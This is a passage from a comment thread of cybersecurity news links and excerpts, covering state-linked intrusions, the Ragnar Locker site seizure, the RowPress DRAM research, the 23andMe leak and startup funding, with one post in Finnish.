In one of the two attack paths employed by Diamond Sleet, a successful compromise of TeamCity servers is followed by the deployment of a known implant called ForestTiger from legitimate infrastructure previously compromised by the threat actor.
Tomi Engdahl says:
Iranian hackers lurked in Middle Eastern govt network for 8 months https://www.bleepingcomputer.com/news/security/iranian-hackers-lurked-in-middle-eastern-govt-network-for-8-months/
The Iranian hacking group tracked as MuddyWater (aka APT34 or OilRig) breached at least twelve computers belonging to a Middle Eastern government network and maintained access for eight months between February and September 2023.
MuddyWater is linked to Iran’s Ministry of Intelligence and Security (MOIS), known for mounting attacks against the U.S., the Middle East, and Albania.
The attacks observed by Symantec’s threat hunter team, part of Broadcom, were used to steal passwords and data, as well as to install a PowerShell backdoor dubbed ‘PowerExchange’, which accepted commands from execution via Microsoft Exchange.
Tomi Engdahl says:
Ragnar Locker ransomware’s dark web extortion sites seized by police https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomwares-dark-web-extortion-sites-seized-by-police/
The Ragnar Locker ransomware operation’s Tor negotiation and data leak sites were seized Thursday morning as part of an international law enforcement operation.
BleepingComputer has confirmed that visiting either website now displays a seizure message stating that a large assortment of international law enforcement from the US, Europe, Germany, France, Italy, Japan, Spain, Netherlands, Czech Republic, and Latvia were involved in the operation.
“This service has been seized as part of a coordinated law enforcement action against the Ragnar Locker group,” reads the message.
A Europol spokesperson has confirmed the seizure message is legitimate as part of an ongoing action targeting the Ragnar Locker ransomware gang and that a press release will be published tomorrow. The FBI declined to comment.
Tomi Engdahl says:
Säkylän kyberhyökkäyksen takana jonkin valtion läheinen ammattiryhmä, kunnanjohtaja vaitonaisena: ”Me emme tee ulkopolitiikkaa”
https://yle.fi/a/74-20055949
Säkylään viime joulukuussa kohdistuneen kyberhyökkäyksen takana uskotaan olevan jonkin valtion lähellä toimiva ammattilaisryhmä.
Säkylän kunnanjohtaja Teijo Mäenpään mukaan tutkinta on osoittanut, että tietomurron selvä tarkoitus on ollut haitata kunnan toimintaa.
– Meillä on se käsitys, että asialla on ollut ammatillinen toimija, joka toimii lähellä valtiota. Ei suomalainen eikä ruotsalainen, mutta emme ota kantaa sijaintimaahan. Säkylän kunta ei tee ulkopolitiikkaa, Mäenpää sanoo.
Tomi Engdahl says:
There’s a new way to flip bits in DRAM, and it works against the latest defenses
https://arstechnica.com/security/2023/10/theres-a-new-way-to-flip-bits-in-dram-and-it-works-against-the-latest-defenses/
New technique produces lots of bitflips and could one day help form an attack.
In 2015, researchers reported a surprising discovery that stoked industry-wide security concerns—an attack called RowHammer that could corrupt, modify, or steal sensitive data when a simple user-level application repeatedly accessed certain regions of DDR memory chips. In the coming years, memory chipmakers scrambled to develop defenses that prevented the attack, mainly by limiting the number of times programs could open and close the targeted chip regions in a given time.
Recently, researchers devised a new method for creating the same types of RowHammer-induced bitflips even on a newer generation of chips, known as DDR4, that have the RowHammer mitigations built into them. Known as RowPress, the new attack works not by “hammering” carefully selected regions repeatedly, but instead by leaving them open for longer periods than normal. Bitflips refer to the phenomenon of bits represented as ones change to zeros and vice versa.
Further amplifying the vulnerability of DDR4 chips to read-disturbance attacks—the generic term for inducing bitflips through abnormal accesses (i.e., activations) to memory chips—RowPress bitflips can be enhanced by combining them with RowHammer accesses. Curiously, raising the temperature of the chip also intensifies the effect.
“We demonstrate a proof of concept RowPress program that can cause bitflips in a real system that already employs protections against RowHammer,” Onur Mutlu, a professor at ETH Zürich and a co-author of a recently published paper titled RowPress: Amplifying Read Disturbance in Modern DRAM Chips, wrote in an email. “Note that this is not in itself an attack. It simply shows that bitflips are possible and plenty, which can easily form the basis of an attack. As many prior works in security have shown, once you can induce a bitflip, you can use that bitflip for various attacks.”
RowPress: Amplifying Read Disturbance in Modern DRAM Chips
https://people.inf.ethz.ch/omutlu/pub/RowPress_isca23.pdf
Memory isolation is critical for system reliability, security, and safety. Unfortunately, read disturbance can break memory isolation in modern DRAM chips. For example, RowHammer is a well-studied read-disturb phenomenon where repeatedly opening and closing (i.e., hammering) a DRAM row many times causes bitflips in physi cally nearby rows.
This paper experimentally demonstrates and analyzes another widespread read-disturb phenomenon, RowPress, in real DDR4 DRAM chips. RowPress breaks memory isolation by keeping a DRAM row open for a long period of time, which disturbs physi cally nearby rows enough to cause bitflips. We show that RowPress amplifies DRAM’s vulnerability to read-disturb attacks by signifi cantly reducing the number of row activations needed to induce a bitflip by one to two orders of magnitude under realistic conditions
Tomi Engdahl says:
https://www.securityweek.com/cipherstash-raises-3-million-for-encryption-in-use-technology/
Tomi Engdahl says:
https://www.securityweek.com/recent-netscaler-vulnerability-exploited-as-zero-day-since-august/
Tomi Engdahl says:
Harmonic Lands $7M Funding to Secure Generative AI Deployments
https://www.securityweek.com/harmonic-lands-7m-funding-to-secure-generative-ai-deployments/
British startup is working on software to mitigate against the ‘wild west’ of unregulated AI apps harvesting company data at scale.
Tomi Engdahl says:
Lorenzo Franceschi-Bicchierai / TechCrunch:
23andMe is investigating a possible new data leak of 4M users’ records on BreachForums; the hacker claims the stolen dataset includes info on people from the UK — The same hacker who leaked a trove of user data stolen from the genetic testing company 23andMe two weeks ago has now leaked millions of new user records.
Hacker leaks millions more 23andMe user records on cybercrime forum
https://techcrunch.com/2023/10/18/hacker-leaks-millions-more-23andme-user-records-on-cybercrime-forum/
Tomi Engdahl says:
https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/